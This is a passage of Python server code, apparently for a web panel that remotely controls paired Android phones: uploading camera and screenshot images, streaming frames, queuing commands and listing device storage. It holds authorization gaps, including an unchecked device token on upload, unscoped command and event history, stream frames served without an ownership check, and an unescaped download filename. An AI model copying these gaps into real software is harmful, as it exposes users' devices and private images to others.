   509вҶ’   509вҶ’    """Multipart file upload."""
   510вҶ’   510вҶ’    store.api_hits += 1
   511вҶ’   511вҶ’    
   512вҶ’   512вҶ’    # Get device_id from form or IP map
   513вҶ’   513вҶ’    device_id = None
   514вҶ’   514вҶ’    token = request.headers.get('X-Device-Token', '')
   515вҶ’   515вҶ’    
   516вҶ’   516вҶ’    try:
   517вҶ’   517вҶ’        reader = await request.multipart()
   518вҶ’   518вҶ’        fields = {}
   519вҶ’   519вҶ’        file_data = None
   520вҶ’   520вҶ’        filename = ""
   521вҶ’   521вҶ’        
   522вҶ’   522вҶ’        async for field in reader:
   523вҶ’   523вҶ’            if field.name == 'file':
   524вҶ’   524вҶ’                file_data = await field.read(decode=False)
   525вҶ’   525вҶ’                filename = field.filename or "unknown"
   526вҶ’   526вҶ’            else:
   527вҶ’   527вҶ’                fields[field.name] = (await field.read(decode=True)).decode('utf-8', errors='replace')
   528вҶ’   528вҶ’        
   529вҶ’   529вҶ’        device_id = fields.get('device_id', '')
   530вҶ’   530вҶ’        if not device_id:
   531вҶ’   531вҶ’            device_id = store._ip_device_map.get(request.remote, '')
   532вҶ’   532вҶ’        
   533вҶ’   533вҶ’        if not device_id:
   534вҶ’   534вҶ’            return json_response({"ok": False, "message": "Unknown device"}, 400)
   535вҶ’   535вҶ’        
   536вҶ’   536вҶ’        file_type = fields.get('file_type', 'file')
   537вҶ’   537вҶ’        command_id = fields.get('command_id', '')
   538вҶ’   538вҶ’        caption = fields.get('caption', '')
   539вҶ’   539вҶ’        
   540вҶ’   540вҶ’        if not file_data:
   541вҶ’   541вҶ’            return json_response({"ok": False, "message": "No file data"}, 400)
   542вҶ’   542вҶ’        
   543вҶ’   543вҶ’        if len(file_data) > MAX_UPLOAD_SIZE:
   544вҶ’   544вҶ’            return json_response({"ok": False, "message": "File too large"}, 413)
   545вҶ’   545вҶ’        
   546вҶ’   546вҶ’        file_meta = await save_upload(device_id, file_data, filename, file_type, command_id, caption)
   547вҶ’   547вҶ’        
   548вҶ’   548вҶ’        return json_response({
   549вҶ’   549вҶ’            "ok": True,
   550вҶ’   550вҶ’            "file_id": file_meta['id'],
   551вҶ’   551вҶ’            "file_name": filename,
   552вҶ’   552вҶ’            "file_size": len(file_data),
   553вҶ’   553вҶ’        })
   554вҶ’   554вҶ’    except Exception as e:
   555вҶ’   555вҶ’        logger.error(f"Upload error: {e}")
   556вҶ’   556вҶ’        return json_response({"ok": False, "message": str(e)}, 500)
   557вҶ’   557вҶ’
   558вҶ’   558вҶ’
   559вҶ’   559вҶ’async def api_upload_base64(request: web.Request) -> web.Response:
   560вҶ’   560вҶ’    """Base64 file upload."""
   561вҶ’   561вҶ’    store.api_hits += 1
   562вҶ’   562вҶ’    device_id, error = get_device_auth(request)
   563вҶ’   563вҶ’    if error:
   564вҶ’   564вҶ’        return json_response({"ok": False, "message": error}, 401)
   565вҶ’   565вҶ’    
   566вҶ’   566вҶ’    try:
   567вҶ’   567вҶ’        body = await request.json()
   568вҶ’   568вҶ’    except:
   569вҶ’   569вҶ’        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   570вҶ’   570вҶ’    
   571вҶ’   571вҶ’    base64_data = body.get('base64_data', '')
   572вҶ’   572вҶ’    filename = body.get('filename', 'upload.jpg')
   573вҶ’   573вҶ’    file_type = body.get('file_type', 'file')
   574вҶ’   574вҶ’    command_id = body.get('command_id', '')
   575вҶ’   575вҶ’    caption = body.get('caption', '')
   576вҶ’   576вҶ’    
   577вҶ’   577вҶ’    if not base64_data:
   578вҶ’   578вҶ’        return json_response({"ok": False, "message": "No base64 data"}, 400)
   579вҶ’   579вҶ’    
   580вҶ’   580вҶ’    try:
   581вҶ’   581вҶ’        file_meta = await save_base64_upload(device_id, base64_data, filename, file_type, command_id, caption)
   582вҶ’   582вҶ’        
   583вҶ’   583вҶ’        # Cache images for streaming viewer
   584вҶ’   584вҶ’        if file_type in ('photo', 'screenshot', 'camera') and base64_data.startswith('/9j/'):
   585вҶ’   585вҶ’            store.latest_frames[f"{device_id}:video"] = {
   586вҶ’   586вҶ’                "data": base64_data,
   587вҶ’   587вҶ’                "timestamp": time.time(),
   588вҶ’   588вҶ’                "source": file_type,
   589вҶ’   589вҶ’            }
   590вҶ’   590вҶ’        
   591вҶ’   591вҶ’        return json_response({
   592вҶ’   592вҶ’            "ok": True,
   593вҶ’   593вҶ’            "file_id": file_meta['id'],
   594вҶ’   594вҶ’            "file_name": filename,
   595вҶ’   595вҶ’        })
   596вҶ’   596вҶ’    except ValueError as e:
   597вҶ’   597вҶ’        return json_response({"ok": False, "message": str(e)}, 400)
   598вҶ’   598вҶ’    except Exception as e:
   599вҶ’   599вҶ’        return json_response({"ok": False, "message": str(e)}, 500)
   600вҶ’   600вҶ’
   601вҶ’   601вҶ’
   602вҶ’   602вҶ’async def api_download_file(request: web.Request) -> web.Response:
   603вҶ’   603вҶ’    """Download a file by file_id."""
   604вҶ’   604вҶ’    file_id = request.match_info.get('file_id', '')
   605вҶ’   605вҶ’    session = get_auth_session(request)
   606вҶ’   606вҶ’    
   607вҶ’   607вҶ’    if not session:
   608вҶ’   608вҶ’        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   609вҶ’   609вҶ’    
   610вҶ’   610вҶ’    data, meta = await get_file(file_id)
   611вҶ’   611вҶ’    if not data:
   612вҶ’   612вҶ’        return json_response({"ok": False, "message": "File not found or expired"}, 404)
   613вҶ’   613вҶ’    
   614вҶ’   614вҶ’    content_type = {
   615вҶ’   615вҶ’        'photo': 'image/jpeg', 'screenshot': 'image/jpeg', 'camera': 'image/jpeg',
   616вҶ’   616вҶ’        'video': 'video/mp4', 'audio': 'audio/mpeg', 'file': 'application/octet-stream'
   617вҶ’   617вҶ’    }.get(meta.get('file_type', ''), 'application/octet-stream')
   618вҶ’   618вҶ’    
   619вҶ’   619вҶ’    return web.Response(
   620вҶ’   620вҶ’        body=data,
   621вҶ’   621вҶ’        content_type=content_type,
   622вҶ’   622вҶ’        headers={
   623вҶ’   623вҶ’            'Content-Disposition': f'attachment; filename="{meta["filename"]}"',
   624вҶ’   624вҶ’            'Content-Length': str(len(data)),
   625вҶ’   625вҶ’        }
   626вҶ’   626вҶ’    )
   627вҶ’   627вҶ’
   628вҶ’   628вҶ’
   629вҶ’   629вҶ’async def api_device_settings(request: web.Request) -> web.Response:
   630вҶ’   630вҶ’    """Device fetches settings."""
   631вҶ’   631вҶ’    device_id = request.match_info.get('device_id', '')
   632вҶ’   632вҶ’    return json_response({
   633вҶ’   633вҶ’        "ok": True,
   634вҶ’   634вҶ’        "settings": {
   635вҶ’   635вҶ’            "sync_interval": store.settings.get('sync_interval', 15),
   636вҶ’   636вҶ’            "location_interval": store.settings.get('location_interval', 300),
   637вҶ’   637вҶ’            "auto_location": store.settings.get('auto_location', False),
   638вҶ’   638вҶ’            "auto_sync": store.settings.get('auto_sync', True),
   639вҶ’   639вҶ’        }
   640вҶ’   640вҶ’    })
   641вҶ’   641вҶ’
   642вҶ’   642вҶ’
   643вҶ’   643вҶ’# в”Җв”Җв”Җ Authenticated Web/Admin API в”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җ
   644вҶ’   644вҶ’
   645вҶ’   645вҶ’async def api_web_devices(request: web.Request) -> web.Response:
   646вҶ’   646вҶ’    session = get_auth_session(request)
   647вҶ’   647вҶ’    if not session:
   648вҶ’   648вҶ’        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   649вҶ’   649вҶ’    
   650вҶ’   650вҶ’    devices = await store.get_user_devices(session['user_id'])
   651вҶ’   651вҶ’    # Map device fields to frontend-expected names
   652вҶ’   652вҶ’    result = []
   653вҶ’   653вҶ’    for d in devices:
   654вҶ’   654вҶ’        dev = dict(d)
   655вҶ’   655вҶ’        dev['is_online'] = store._device_last_online.get(d['id'], False)
   656вҶ’   656вҶ’        if 'online' in dev:
   657вҶ’   657вҶ’            del dev['online']
   658вҶ’   658вҶ’        if 'battery' in dev:
   659вҶ’   659вҶ’            dev['battery_level'] = dev.pop('battery')
   660вҶ’   660вҶ’        if 'os' in dev:
   661вҶ’   661вҶ’            dev['android_version'] = dev.pop('os')
   662вҶ’   662вҶ’        elif 'os_version' in dev:
   663вҶ’   663вҶ’            dev['android_version'] = dev.pop('os_version')
   664вҶ’   664вҶ’        if 'created_at' in dev:
   665вҶ’   665вҶ’            dev['linked_at'] = dev.pop('created_at')
   666вҶ’   666вҶ’        result.append(dev)
   667вҶ’   667вҶ’    
   668вҶ’   668вҶ’    return json_response({"ok": True, "devices": result})
   669вҶ’   669вҶ’
   670вҶ’   670вҶ’
   671вҶ’   671вҶ’async def api_web_device_detail(request: web.Request) -> web.Response:
   672вҶ’   672вҶ’    session = get_auth_session(request)
   673вҶ’   673вҶ’    if not session:
   674вҶ’   674вҶ’        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   675вҶ’   675вҶ’    
   676вҶ’   676вҶ’    device_id = request.match_info.get('device_id', '')
   677вҶ’   677вҶ’    device = await store.get_user_device(session['user_id'], device_id)
   678вҶ’   678вҶ’    if not device:
   679вҶ’   679вҶ’        return json_response({"ok": False, "message": "Device not found"}, 404)
   680вҶ’   680вҶ’    
   681вҶ’   681вҶ’    dev = dict(device)
   682вҶ’   682вҶ’    dev['is_online'] = store._device_last_online.get(device_id, False)
   683вҶ’   683вҶ’    if 'online' in dev:
   684вҶ’   684вҶ’        del dev['online']
   685вҶ’   685вҶ’    if 'battery' in dev:
   686вҶ’   686вҶ’        dev['battery_level'] = dev.pop('battery')
   687вҶ’   687вҶ’    if 'os' in dev:
   688вҶ’   688вҶ’        dev['android_version'] = dev.pop('os')
   689вҶ’   689вҶ’    elif 'os_version' in dev:
   690вҶ’   690вҶ’        dev['android_version'] = dev.pop('os_version')
   691вҶ’   691вҶ’    if 'created_at' in dev:
   692вҶ’   692вҶ’        dev['linked_at'] = dev.pop('created_at')
   693вҶ’   693вҶ’    commands = await store.get_commands_history(device_id, limit=20)
   694вҶ’   694вҶ’    
   695вҶ’   695вҶ’    return json_response({"ok": True, "device": dev, "commands": commands})
   696вҶ’   696вҶ’
   697вҶ’   697вҶ’
   698вҶ’   698вҶ’async def api_web_commands(request: web.Request) -> web.Response:
   699вҶ’   699вҶ’    session = get_auth_session(request)
   700вҶ’   700вҶ’    if not session:
   701вҶ’   701вҶ’        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   702вҶ’   702вҶ’    
   703вҶ’   703вҶ’    commands = await store.get_commands_history(limit=100)
   704вҶ’   704вҶ’    return json_response({"ok": True, "commands": commands})
   705вҶ’   705вҶ’
   706вҶ’   706вҶ’
   707вҶ’   707вҶ’async def api_web_events(request: web.Request) -> web.Response:
   708вҶ’   708вҶ’    session = get_auth_session(request)
   709вҶ’   709вҶ’    if not session:
   710вҶ’   710вҶ’        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   711вҶ’   711вҶ’    
   712вҶ’   712вҶ’    device_id = request.query.get('device_id', '')
   713вҶ’   713вҶ’    event_type = request.query.get('type', '')
   714вҶ’   714вҶ’    events = await store.get_events(device_id=device_id or None, event_type=event_type or None, limit=100)
   715вҶ’   715вҶ’    return json_response({"ok": True, "events": events})
   716вҶ’   716вҶ’
   717вҶ’   717вҶ’
   718вҶ’   718вҶ’async def api_web_stats(request: web.Request) -> web.Response:
   719вҶ’   719вҶ’    session = get_auth_session(request)
   720вҶ’   720вҶ’    if not session:
   721вҶ’   721вҶ’        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   722вҶ’   722вҶ’    
   723вҶ’   723вҶ’    stats = store.get_stats()
   724вҶ’   724вҶ’    stats['storage'] = get_storage_stats()
   725вҶ’   725вҶ’    return json_response({"ok": True, "stats": stats})
   726вҶ’   726вҶ’
   727вҶ’   727вҶ’
   728вҶ’   728вҶ’async def api_web_send_command(request: web.Request) -> web.Response:
   729вҶ’   729вҶ’    session = get_auth_session(request)
   730вҶ’   730вҶ’    if not session:
   731вҶ’   731вҶ’        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   732вҶ’   732вҶ’    
   733вҶ’   733вҶ’    try:
   734вҶ’   734вҶ’        body = await request.json()
   735вҶ’   735вҶ’    except:
   736вҶ’   736вҶ’        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   737вҶ’   737вҶ’    
   738вҶ’   738вҶ’    device_id = body.get('device_id', '')
   739вҶ’   739вҶ’    command = body.get('command', '')
   740вҶ’   740вҶ’    params = body.get('params', {})
   741вҶ’   741вҶ’    
   742вҶ’   742вҶ’    if not device_id or not command:
   743вҶ’   743вҶ’        return json_response({"ok": False, "message": "Missing device_id or command"}, 400)
   744вҶ’   744вҶ’    
   745вҶ’   745вҶ’    # Check device ownership
   746вҶ’   746вҶ’    device = await store.get_user_device(session['user_id'], device_id)
   747вҶ’   747вҶ’    if not device:
   748вҶ’   748вҶ’        return json_response({"ok": False, "message": "Device not found or access denied"}, 404)
   749вҶ’   749вҶ’    
   750вҶ’   750вҶ’    # Look up the actual command
   751вҶ’   751вҶ’    cmd_def = COMMAND_REGISTRY.get(command, {})
   752вҶ’   752вҶ’    actual_cmd = cmd_def.get('cmd', command)
   753вҶ’   753вҶ’    actual_params = cmd_def.get('params', {})
   754вҶ’   754вҶ’    if params:
   755вҶ’   755вҶ’        actual_params.update(params)
   756вҶ’   756вҶ’    
   757вҶ’   757вҶ’    # Rate limit
   758вҶ’   758вҶ’    if not store.check_rate_limit(f"cmd_{session['user_id']}", 20, 60):
   759вҶ’   759вҶ’        return json_response({"ok": False, "message": "Rate limited"}, 429)
   760вҶ’   760вҶ’    
   761вҶ’   761вҶ’    # Queue command
   762вҶ’   762вҶ’    queued = await store.queue_command(
   763вҶ’   763вҶ’        device_id=device_id,
   764вҶ’   764вҶ’        command=actual_cmd,
   765вҶ’   765вҶ’        params=actual_params,
   766вҶ’   766вҶ’        requested_by=session['user_id'],
   767вҶ’   767вҶ’        source="web"
   768вҶ’   768вҶ’    )
   769вҶ’   769вҶ’    
   770вҶ’   770вҶ’    # Push to Firebase
   771вҶ’   771вҶ’    if _fb.firebase_connected:
   772вҶ’   772вҶ’        await push_command(device_id, {
   773вҶ’   773вҶ’            "id": queued['id'],
   774вҶ’   774вҶ’            "command": actual_cmd,
   775вҶ’   775вҶ’            "params": actual_params,
   776вҶ’   776вҶ’            "created_at": queued['created_at'],
   777вҶ’   777вҶ’        })
   778вҶ’   778вҶ’    
   779вҶ’   779вҶ’    await store.add_event("command", f"Command queued: {actual_cmd} -> {device_id}",
   780вҶ’   780вҶ’                         "info", device_id=device_id, user_id=session['user_id'])
   781вҶ’   781вҶ’    
   782вҶ’   782вҶ’    return json_response({"ok": True, "command": queued})
   783вҶ’   783вҶ’
   784вҶ’   784вҶ’
   785вҶ’   785вҶ’async def api_web_link_code(request: web.Request) -> web.Response:
   786вҶ’   786вҶ’    session = get_auth_session(request)
   787вҶ’   787вҶ’    if not session:
   788вҶ’   788вҶ’        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   789вҶ’   789вҶ’    
   790вҶ’   790вҶ’    code_data = store.generate_pairing_code(session['user_id'])
   791вҶ’   791вҶ’    return json_response({"ok": True, "code": code_data['code'], "session_id": code_data['session_id']})
   792вҶ’   792вҶ’
   793вҶ’   793вҶ’
   794вҶ’   794вҶ’async def api_web_settings_get(request: web.Request) -> web.Response:
   795вҶ’   795вҶ’    session = get_auth_session(request)
   796вҶ’   796вҶ’    if not session:
   797вҶ’   797вҶ’        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   798вҶ’   798вҶ’    
   799вҶ’   799вҶ’    return json_response({"ok": True, "settings": store.settings})
   800вҶ’   800вҶ’
   801вҶ’   801вҶ’
   802вҶ’   802вҶ’async def api_web_settings_set(request: web.Request) -> web.Response:
   803вҶ’   803вҶ’    session = get_auth_session(request)
   804вҶ’   804вҶ’    if not session:
   805вҶ’   805вҶ’        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   806вҶ’   806вҶ’    
   807вҶ’   807вҶ’    if session['role'] != 'admin':
   808вҶ’   808вҶ’        return json_response({"ok": False, "message": "Admin only"}, 403)
   809вҶ’   809вҶ’    
   810вҶ’   810вҶ’    try:
   811вҶ’   811вҶ’        body = await request.json()
   812вҶ’   812вҶ’    except:
   813вҶ’   813вҶ’        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   814вҶ’   814вҶ’    
   815вҶ’   815вҶ’    store.settings.update(body)
   816вҶ’   816вҶ’    await _save_json("settings.json", store.settings)
   817вҶ’   817вҶ’    
   818вҶ’   818вҶ’    return json_response({"ok": True})
   819вҶ’   819вҶ’
   820вҶ’   820вҶ’
   821вҶ’   821вҶ’async def api_web_unlink(request: web.Request) -> web.Response:
   822вҶ’   822вҶ’    session = get_auth_session(request)
   823вҶ’   823вҶ’    if not session:
   824вҶ’   824вҶ’        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   825вҶ’   825вҶ’    
   826вҶ’   826вҶ’    device_id = request.match_info.get('device_id', '')
   827вҶ’   827вҶ’    success = await store.unlink_device(device_id, session['user_id'])
   828вҶ’   828вҶ’    
   829вҶ’   829вҶ’    if success:
   830вҶ’   830вҶ’        return json_response({"ok": True})
   831вҶ’   831вҶ’    return json_response({"ok": False, "message": "Device not found"}, 404)
   832вҶ’   832вҶ’
   833вҶ’   833вҶ’
   834вҶ’   834вҶ’async def api_web_logout(request: web.Request) -> web.Response:
   835вҶ’   835вҶ’    session = get_auth_session(request)
   836вҶ’   836вҶ’    if not session:
   837вҶ’   837вҶ’        return json_response({"ok": False, "message": "Not logged in"}, 401)
   838вҶ’   838вҶ’    
   839вҶ’   839вҶ’    token = request.headers.get('Authorization', '').replace('Bearer ', '')
   840вҶ’   840вҶ’    if token in store.sessions:
   841вҶ’   841вҶ’        del store.sessions[token]
   842вҶ’   842вҶ’    
   843вҶ’   843вҶ’    return json_response({"ok": True})
   844вҶ’   844вҶ’
   845вҶ’   845вҶ’
   846вҶ’   846вҶ’async def _save_json(name, data):
   847вҶ’   847вҶ’    from .store import _save_json as _sj
   848вҶ’   848вҶ’    await _sj(name, data)
   849вҶ’   849вҶ’
   850вҶ’   850вҶ’
   851вҶ’   851вҶ’# в”Җв”Җв”Җ User Management API (Admin) в”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җ
   852вҶ’   852вҶ’
   853вҶ’   853вҶ’async def api_web_users(request: web.Request) -> web.Response:
   854вҶ’   854вҶ’    session = get_auth_session(request)
   855вҶ’   855вҶ’    if not session or session['role'] != 'admin':
   856вҶ’   856вҶ’        return json_response({"ok": False, "message": "Admin only"}, 403)
   857вҶ’   857вҶ’    
   858вҶ’   858вҶ’    users = await store.list_users()
   859вҶ’   859вҶ’    # Remove password hashes from response
   860вҶ’   860вҶ’    safe_users = []
   861вҶ’   861вҶ’    for u in users:
   862вҶ’   862вҶ’        safe = dict(u)
   863вҶ’   863вҶ’        safe.pop('password_hash', None)
   864вҶ’   864вҶ’        safe_users.append(safe)
   865вҶ’   865вҶ’    
   866вҶ’   866вҶ’    return json_response({"ok": True, "users": safe_users})
   867вҶ’   867вҶ’
   868вҶ’   868вҶ’
   869вҶ’   869вҶ’async def api_web_create_user(request: web.Request) -> web.Response:
   870вҶ’   870вҶ’    session = get_auth_session(request)
   871вҶ’   871вҶ’    if not session or session['role'] != 'admin':
   872вҶ’   872вҶ’        return json_response({"ok": False, "message": "Admin only"}, 403)
   873вҶ’   873вҶ’    
   874вҶ’   874вҶ’    try:
   875вҶ’   875вҶ’        body = await request.json()
   876вҶ’   876вҶ’    except:
   877вҶ’   877вҶ’        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   878вҶ’   878вҶ’    
   879вҶ’   879вҶ’    email = body.get('email', '')
   880вҶ’   880вҶ’    username = body.get('username', '')
   881вҶ’   881вҶ’    password = body.get('password', '')
   882вҶ’   882вҶ’    role = body.get('role', 'user')
   883вҶ’   883вҶ’    
   884вҶ’   884вҶ’    if not email or not username or not password:
   885вҶ’   885вҶ’        return json_response({"ok": False, "message": "Missing required fields"}, 400)
   886вҶ’   886вҶ’    
   887вҶ’   887вҶ’    try:
   888вҶ’   888вҶ’        user = await store.create_user(email, username, password, role)
   889вҶ’   889вҶ’        safe = dict(user)
   890вҶ’   890вҶ’        safe.pop('password_hash', None)
   891вҶ’   891вҶ’        return json_response({"ok": True, "user": safe})
   892вҶ’   892вҶ’    except ValueError as e:
   893вҶ’   893вҶ’        return json_response({"ok": False, "message": str(e)}, 400)
   894вҶ’   894вҶ’
   895вҶ’   895вҶ’
   896вҶ’   896вҶ’async def api_web_delete_user(request: web.Request) -> web.Response:
   897вҶ’   897вҶ’    session = get_auth_session(request)
   898вҶ’   898вҶ’    if not session or session['role'] != 'admin':
   899вҶ’   899вҶ’        return json_response({"ok": False, "message": "Admin only"}, 403)
   900вҶ’   900вҶ’    
   901вҶ’   901вҶ’    user_id = request.match_info.get('user_id', '')
   902вҶ’   902вҶ’    if user_id == session['user_id']:
   903вҶ’   903вҶ’        return json_response({"ok": False, "message": "Cannot delete yourself"}, 400)
   904вҶ’   904вҶ’    
   905вҶ’   905вҶ’    success = await store.delete_user(user_id)
   906вҶ’   906вҶ’    if success:
   907вҶ’   907вҶ’        return json_response({"ok": True})
   908вҶ’   908вҶ’    return json_response({"ok": False, "message": "User not found"}, 404)
   909вҶ’   909вҶ’
   910вҶ’   910вҶ’
   911вҶ’   911вҶ’async def api_web_regenerate_code(request: web.Request) -> web.Response:
   912вҶ’   912вҶ’    session = get_auth_session(request)
   913вҶ’   913вҶ’    if not session:
   914вҶ’   914вҶ’        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   915вҶ’   915вҶ’    new_code = await store.regenerate_permanent_code(session['user_id'])
   916вҶ’   916вҶ’    if _fb.firebase_connected:
   917вҶ’   917вҶ’        from .firebase_client import sync_permanent_code
   918вҶ’   918вҶ’        user = await store.get_user(session['user_id'])
   919вҶ’   919вҶ’        if user:
   920вҶ’   920вҶ’            await sync_permanent_code(user['email'], new_code, session['user_id'])
   921вҶ’   921вҶ’    return json_response({"ok": True, "code": new_code})
   922вҶ’   922вҶ’
   923вҶ’   923вҶ’
   924вҶ’   924вҶ’# в”Җв”Җв”Җ File Management API в”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җ
   925вҶ’   925вҶ’
   926вҶ’   926вҶ’async def api_web_files(request: web.Request) -> web.Response:
   927вҶ’   927вҶ’    session = get_auth_session(request)
   928вҶ’   928вҶ’    if not session:
   929вҶ’   929вҶ’        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   930вҶ’   930вҶ’    
   931вҶ’   931вҶ’    device_id = request.query.get('device_id', '')
   932вҶ’   932вҶ’    
   933вҶ’   933вҶ’    # List active files for the user's devices
   934вҶ’   934вҶ’    files = []
   935вҶ’   935вҶ’    for fid, fmeta in store.files.items():
   936вҶ’   936вҶ’        if device_id and fmeta.get('device_id') != device_id:
   937вҶ’   937вҶ’            continue
   938вҶ’   938вҶ’        # Check ownership
   939вҶ’   939вҶ’        device = store.devices.get(fmeta.get('device_id', ''))
   940вҶ’   940вҶ’        if device and (session['role'] == 'admin' or device.get('owner_id') == session['user_id']):
   941вҶ’   941вҶ’            safe = dict(fmeta)
   942вҶ’   942вҶ’            safe.pop('path', None)
   943вҶ’   943вҶ’            files.append(safe)
   944вҶ’   944вҶ’    
   945вҶ’   945вҶ’    return json_response({"ok": True, "files": files})
   946вҶ’   946вҶ’
   947вҶ’   947вҶ’
   948вҶ’   948вҶ’async def api_web_list_files_device(request: web.Request) -> web.Response:
   949вҶ’   949вҶ’    """Send list_files command to device and return result."""
   950вҶ’   950вҶ’    session = get_auth_session(request)
   951вҶ’   951вҶ’    if not session:
   952вҶ’   952вҶ’        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   953вҶ’   953вҶ’    
   954вҶ’   954вҶ’    device_id = request.query.get('device_id', '')
   955вҶ’   955вҶ’    path = request.query.get('path', '/storage/emulated/0/')
   956вҶ’   956вҶ’    
   957вҶ’   957вҶ’    if not device_id:
   958вҶ’   958вҶ’        return json_response({"ok": False, "message": "Missing device_id"}, 400)
   959вҶ’   959вҶ’    
   960вҶ’   960вҶ’    device = await store.get_user_device(session['user_id'], device_id)
   961вҶ’   961вҶ’    if not device:
   962вҶ’   962вҶ’        return json_response({"ok": False, "message": "Device not found"}, 404)
   963вҶ’   963вҶ’    
   964вҶ’   964вҶ’    queued = await store.queue_command(
   965вҶ’   965вҶ’        device_id=device_id,
   966вҶ’   966вҶ’        command="list_files",
   967вҶ’   967вҶ’        params={"path": path},
   968вҶ’   968вҶ’        requested_by=session['user_id'],
   969вҶ’   969вҶ’        source="web"
   970вҶ’   970вҶ’    )
   971вҶ’   971вҶ’    
   972вҶ’   972вҶ’    if _fb.firebase_connected:
   973вҶ’   973вҶ’        await push_command(device_id, {
   974вҶ’   974вҶ’            "id": queued['id'],
   975вҶ’   975вҶ’            "command": "list_files",
   976вҶ’   976вҶ’            "params": {"path": path},
   977вҶ’   977вҶ’            "created_at": queued['created_at'],
   978вҶ’   978вҶ’        })
   979вҶ’   979вҶ’    
   980вҶ’   980вҶ’    return json_response({"ok": True, "command": queued, "message": "Command queued"})
   981вҶ’   981вҶ’
   982вҶ’   982вҶ’
   983вҶ’   983вҶ’# в”Җв”Җв”Җ Streaming API в”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җ
   984вҶ’   984вҶ’
   985вҶ’   985вҶ’async def api_stream_frame(request: web.Request) -> web.Response:
   986вҶ’   986вҶ’    session = get_auth_session(request)
   987вҶ’   987вҶ’    if not session:
   988вҶ’   988вҶ’        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   989вҶ’   989вҶ’    
   990вҶ’   990вҶ’    device_id = request.match_info.get('device_id', '')
   991вҶ’   991вҶ’    stream_type = request.query.get('type', 'video')
   992вҶ’   992вҶ’    key = f"{device_id}:{stream_type}"
   993вҶ’   993вҶ’    
   994вҶ’   994вҶ’    frame = store.latest_frames.get(key)
   995вҶ’   995вҶ’    if not frame:
   996вҶ’   996вҶ’        return json_response({"ok": False, "message": "No frame available"}, 404)
   997вҶ’   997вҶ’    
   998вҶ’   998вҶ’    return json_response({
   999вҶ’   999вҶ’        "ok": True,
  1000вҶ’  1000вҶ’        "data": frame.get('data', ''),
  1001вҶ’  1001вҶ’        "timestamp": frame.get('timestamp', 0),
  1002вҶ’  1002вҶ’        "source": frame.get('source', ''),
  1003вҶ’  1003вҶ’    })
  1004вҶ’  1004вҶ’
  1005вҶ’  1005вҶ’
  1006вҶ’  1006вҶ’async def api_stream_status(request: web.Request) -> web.Response:
  1007вҶ’  1007вҶ’    session = get_auth_session(request)
  1008вҶ’  1008вҶ’    if not session:
  1009вҶ’  1009вҶ’        return json_response({"ok": False, "message": "Unauthorized"}, 401)
  1010вҶ’  1010вҶ’    
  1011вҶ’  1011вҶ’    streams = {}
  1012вҶ’  1012вҶ’    for key, info in store.jpeg_stream_info.items():
  1013вҶ’  1013вҶ’        if info.get('active'):
  1014вҶ’  1014вҶ’            streams[key] = info
  1015вҶ’  1015вҶ’    
  1016вҶ’  1016вҶ’    return json_response({"ok": True, "streams": streams})
  1017вҶ’  1017вҶ’
  1018вҶ’  1018вҶ’
  1019вҶ’  1019вҶ’async def api_stream_start(request: web.Request) -> web.Response:
  1020вҶ’  1020вҶ’    """Device notifies server that a stream started."""
  1021вҶ’  1021вҶ’    device_id, error = get_device_auth(request)
  1022вҶ’  1022вҶ’    if error:
  1023вҶ’  1023вҶ’        return json_response({"ok": False, "message": error}, 401)
  1024вҶ’  1024вҶ’    
  1025вҶ’  1025вҶ’    try:
  1026вҶ’  1026вҶ’        body = await request.json()
  1027вҶ’  1027вҶ’    except:
  1028вҶ’  1028вҶ’        body = {}
  1029вҶ’  1029вҶ’    
  1030вҶ’  1030вҶ’    stream_id = body.get('stream_id', '')
  1031вҶ’  1031вҶ’    stream_type = body.get('type', 'screen')
  1032вҶ’  1032вҶ’    
  1033вҶ’  1033вҶ’    store.jpeg_stream_info[device_id] = {
  1034вҶ’  1034вҶ’        "active": True,
  1035вҶ’  1035вҶ’        "type": stream_type,
  1036вҶ’  1036вҶ’        "stream_id": stream_id,
  1037вҶ’  1037вҶ’        "started_at": datetime.utcnow().isoformat(),
  1038вҶ’  1038вҶ’    }
  1039вҶ’  1039вҶ’    
  1040вҶ’  1040вҶ’    return json_response({"ok": True})
  1041вҶ’  1041вҶ’
  1042вҶ’  1042вҶ’
  1043вҶ’  1043вҶ’async def api_stream_stop(request: web.Request) -> web.Response:
  1044вҶ’  1044вҶ’    """Device notifies server that a stream stopped."""
  1045вҶ’  1045вҶ’    device_id, error = get_device_auth(request)
  1046вҶ’  1046вҶ’    if error:
  1047вҶ’  1047вҶ’        return json_response({"ok": False, "message": error}, 401)
